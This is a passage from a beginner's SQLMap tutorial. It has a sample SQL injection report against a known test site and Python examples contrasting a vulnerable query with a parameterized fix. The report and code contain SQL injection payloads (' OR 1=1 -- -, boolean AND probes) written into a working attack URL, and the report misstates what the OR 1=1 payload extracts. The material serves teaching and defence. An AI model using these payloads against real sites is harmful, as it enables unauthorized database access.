Whether the file holds a GET or a POST request, the -r option allows SQLMap to read the HTTP request from the specified file and use it as the basis for the scan. This is useful when dealing with complex requests or scenarios where you want to manually modify the request before scanning.
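As an added example (not from the post or from sqlmap itself), here is a small parser that splits a saved request file like post_request.txt into the parts a scanner works from, and flags a hand-edited body whose Content-Length was not updated. The sample request is constructed for this example in the shape of the one above.

```python
from urllib.parse import parse_qs

# Constructed sample request in the same shape as post_request.txt above
# (shortened, with a harmless comment body); not captured from any site.
SAMPLE_REQUEST = (
    "POST /comment.php HTTP/1.1\r\n"
    "Host: testphp.vulnweb.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 45\r\n"
    "\r\n"
    "name=tester&comment=hello+there&Submit=Submit"
)

def parse_request_file(text):
    """Split a raw HTTP request file (the input to sqlmap -r) into method,
    path, version, headers and decoded query/body parameters, i.e. the
    inputs a scanner would treat as candidate injection points."""
    # Accept CRLF (as saved from a browser or proxy) as well as bare LF.
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    body = body.rstrip("\n")  # ignore a trailing newline added by an editor
    lines = head.split("\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError("malformed request line: %r" % lines[0])
    method, target, version = parts
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        headers[name.strip().lower()] = value.strip()
    # A body edited by hand without updating Content-Length is a common
    # mistake; flag it instead of scanning a truncated body.
    declared = headers.get("content-length")
    if declared is not None and int(declared) != len(body.encode()):
        raise ValueError("Content-Length %s != body length %d" % (declared, len(body.encode())))
    path, _, query = target.partition("?")
    return {
        "method": method, "path": path, "version": version, "headers": headers,
        "query_params": parse_qs(query, keep_blank_values=True),
        "body_params": parse_qs(body, keep_blank_values=True),
    }
```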

Making a Report on Vulnerability

Below is a sample SQL injection vulnerability report, to show what such a report looks like.

Report on Boolean-based SQL Vulnerability

  • Introduction:

This report aims to highlight the presence of a boolean-based SQL injection vulnerability on the website http://testphp.vulnweb.com/listproducts.php?cat=1. The vulnerability allows attackers to manipulate the underlying SQL queries by exploiting insufficient input validation, potentially leading to unauthorized data access or manipulation.

  • Vulnerability Description:

The boolean-based SQL injection vulnerability is a type of SQL injection attack that leverages the application’s response to Boolean-based queries. By crafting malicious input, an attacker can infer the presence of a vulnerability and exploit it to extract sensitive information or perform unauthorized operations on the database.

  • Vulnerable URL:

http://testphp.vulnweb.com/listproducts.php?cat=1

  • Proof of Concept (PoC):

To demonstrate the vulnerability, the following example uses a simple boolean-based SQL injection payload that aims to extract the version of the database management system.

Example Payload: ' OR 1=1 -- -

Steps to Reproduce:

  • Request the vulnerable URL with the payload in the cat parameter:

http://testphp.vulnweb.com/listproducts.php?cat=' OR 1=1 -- -

  • Observe the response from the website. If the page displays the same content as the original page, it indicates a successful boolean-based SQL injection.

Impact:

The boolean-based SQL injection vulnerability can have severe consequences, including:

  • Unauthorized access to sensitive information, such as user credentials, personal data, or financial records.
  • Modification, addition, or deletion of data within the database.
  • Complete compromise of the application, allowing further exploitation and attacks.

Mitigation:

To address the boolean-based SQL injection vulnerability, the website’s developers should follow these best practices:

  • Implement input validation and parameterized queries to prevent SQL injection attacks.
  • Apply the principle of least privilege to restrict database access for application users.
  • Regularly update and patch the underlying database management system and web application.
  • Conduct regular security testing, including vulnerability assessments and penetration testing.
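As an added example (not from the post), here is the unsanitized category lookup from the start of this guide beside its parameterized fix, using an in-memory SQLite table that stands in for the products table behind listproducts.php. The boolean probes from the report above are reused as a regression check that the hardened query no longer evaluates injected conditions.

```python
import sqlite3

# Constructed in-memory stand-in for the products table behind
# listproducts.php?cat=<id>; the rows are invented for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, category TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "Poster", "1"), (2, "Lamp", "2"), (3, "Chair", "3")])
    return conn

def list_products_vulnerable(conn, cat):
    # Vulnerable: the request parameter is spliced into the SQL text, exactly
    # the unsanitized lookup described at the start of this guide.
    sql = "SELECT id, name FROM products WHERE category = '%s'" % cat
    return conn.execute(sql).fetchall()

def list_products_parameterized(conn, cat):
    # Hardened: the value is bound as a parameter and never parsed as SQL,
    # so any payload is compared only as a literal category string.
    sql = "SELECT id, name FROM products WHERE category = ?"
    return conn.execute(sql, (cat,)).fetchall()

def boolean_probe_differs(conn, lookup, cat="1"):
    # The boolean-based check from the report above, usable as a regression
    # test: a TRUE and a FALSE condition appended to a valid id must yield
    # the same result for a safe query. Differing results mean the database
    # evaluated the condition, i.e. the parameter is injectable.
    true_probe = lookup(conn, cat + "' AND 1=1 -- -")
    false_probe = lookup(conn, cat + "' AND 1=2 -- -")
    return true_probe != false_probe

if __name__ == "__main__":
    db = make_db()
    print("OR 1=1 via vulnerable lookup:", list_products_vulnerable(db, "' OR 1=1 -- -"))
    print("OR 1=1 via parameterized lookup:", list_products_parameterized(db, "' OR 1=1 -- -"))
    print("vulnerable lookup injectable?", boolean_probe_differs(db, list_products_vulnerable))
    print("parameterized lookup injectable?", boolean_probe_differs(db, list_products_parameterized))
```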

Conclusion:

The presence of a boolean-based SQL injection vulnerability on the website http://testphp.vulnweb.com/listproducts.php?cat=1 poses significant security risks. It allows attackers to manipulate SQL queries and potentially compromise sensitive data. It is crucial for the website’s developers to promptly address this vulnerability by implementing secure coding practices and conducting regular security assessments.

Note: This report is intended for educational purposes and has been responsibly disclosed to raise awareness about the importance of secure coding and vulnerability management. Always obtain proper authorization before conducting security testing on websites or applications.

Conclusion

In conclusion, SQLmap is a powerful and versatile tool that offers a comprehensive solution for beginners seeking to understand and identify SQL injection vulnerabilities. Throughout this guide, we have explored the fundamentals of SQL injection, its potential risks, and how attackers can exploit it to gain unauthorized access to sensitive databases.

With SQLmap, beginners can dive into the world of web application security and put their newfound knowledge to practical use. The tool’s user-friendly interface and extensive set of features make it accessible even to those with limited prior experience in penetration testing.

We have learned how to initiate basic scans, retrieve database information, and dump data from vulnerable applications. Additionally, we explored more advanced options, such as WAF evasion and customization using HTTP headers.

However, it is crucial to emphasize the importance of ethical use and responsible disclosure when using SQLmap or any other security tool. Always seek proper authorization before scanning or testing any web application, as unauthorized actions could lead to legal consequences.

As beginners continue their journey into the realm of cybersecurity, it is essential to keep learning, stay updated with the latest security trends, and follow best practices for secure coding and application development. Regularly engaging in cybersecurity communities and forums can help expand knowledge and foster a sense of community among enthusiasts.

Ultimately, SQLmap is not just a tool for beginners but a valuable asset for security professionals and organizations seeking to fortify their web applications against SQL injection attacks. By learning to identify vulnerabilities and apply remediation strategies, individuals can contribute to a safer and more secure digital landscape.

In conclusion, this guide is just the beginning of an exciting journey into the vast world of cybersecurity. Armed with the knowledge gained from this comprehensive guide, beginners can take their first steps towards becoming skilled defenders against the ever-evolving threats of the digital world. Let’s continue to learn, explore, and collaborate to build a more resilient and secure cyberspace for all. Happy Ethical hacking!
